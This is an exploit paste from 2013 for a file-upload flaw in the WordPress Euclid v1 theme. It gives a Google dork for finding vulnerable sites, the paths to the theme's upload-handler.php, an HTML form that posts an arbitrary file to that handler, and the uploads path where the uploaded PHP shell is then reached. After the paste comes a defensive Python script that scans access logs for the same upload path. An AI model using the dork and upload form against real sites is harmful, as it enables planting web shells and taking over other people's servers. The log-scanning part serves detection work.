LiberoExploit

Wordpress Euclid V1 Themes CSRF File Upload Vulnerability

Nov 16th, 2013
#Title : Wordpress Euclid V1 Themes CSRF File Upload Vulnerability

#Author : DevilScreaM

#Date : 11/17/2013 - 17 November 2013

#Category : Web Applications

#Type : PHP

#Version : 1.x.x

#Vendor : http://freelancewp.com

#Download : http://freelancewp.com/wordpress-theme/euclid/

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Tested : Mozilla, Chrome, Opera -> Windows & Linux

#Vulnerability : CSRF

#Dork :

inurl:wp-content/themes/euclid_v1


CSRF File Upload Vulnerability

Exploit & POC :

http://site-target/wp-content/themes/euclid/functions/upload-handler.php
http://site-target/wp-content/themes/euclid_v1.x.x/functions/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/euclid/functions/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>


File Access :

http://site-target/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
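Defender-side detection for the upload path described above, as an added example that is not part of the original paste: it scans Apache combined-format access logs for POSTs to the theme's upload-handler.php and for .php files served out of wp-content/uploads/YYYY/MM/. The sample log lines are constructed, and the log field layout and regular expressions are assumptions about the server's log format.

```python
import re
from collections import defaultdict

# Constructed Apache combined-log sample (not from the original paste); the
# upload path /2013/11/devilscream.php mirrors the "File Access" example above.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Nov/2013:10:02:11 +0000] "GET /wp-content/themes/euclid/style.css HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Nov/2013:10:02:15 +0000] "POST /wp-content/themes/euclid/functions/upload-handler.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Nov/2013:10:02:20 +0000] "GET /wp-content/uploads/2013/11/devilscream.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.4 - - [17/Nov/2013:10:05:01 +0000] "GET /wp-content/uploads/2013/11/logo.png HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
198.51.100.4 - - [17/Nov/2013:10:06:30 +0000] "POST /wp-content/themes/euclid_v1.0.1/functions/upload-handler.php HTTP/1.1" 200 57 "-" "curl/7.30"
"""

# Assumed combined-log layout: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# The handler lives under themes/euclid/ or themes/euclid_v1.x.x/ (both forms appear in the advisory).
HANDLER_RE = re.compile(r'^/wp-content/themes/euclid[^/]*/functions/upload-handler\.php$')
# Executable scripts should never sit under the date-based uploads tree.
PHP_UPLOAD_RE = re.compile(r'^/wp-content/uploads/\d{4}/\d{2}/[^/]+\.php\d?$', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string before matching
    return rec


def find_upload_abuse(log_text):
    """Return {ip: {"handler_posts": int, "php_in_uploads": [paths]}} for every client
    that POSTed to the theme upload handler or fetched a .php file from wp-content/uploads.
    Keep the two signals separate: with CSRF the POST can come from a victim's IP while
    the uploaded script is fetched from a different address."""
    findings = defaultdict(lambda: {"handler_posts": 0, "php_in_uploads": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and HANDLER_RE.match(rec["path"]):
            findings[rec["ip"]]["handler_posts"] += 1
        elif PHP_UPLOAD_RE.match(rec["path"]):
            findings[rec["ip"]]["php_in_uploads"].append(rec["path"])
    return dict(findings)
```

Calling find_upload_abuse(SAMPLE_LOG) flags both clients for hitting the handler, and only 203.0.113.7 for then fetching a .php file from the uploads tree.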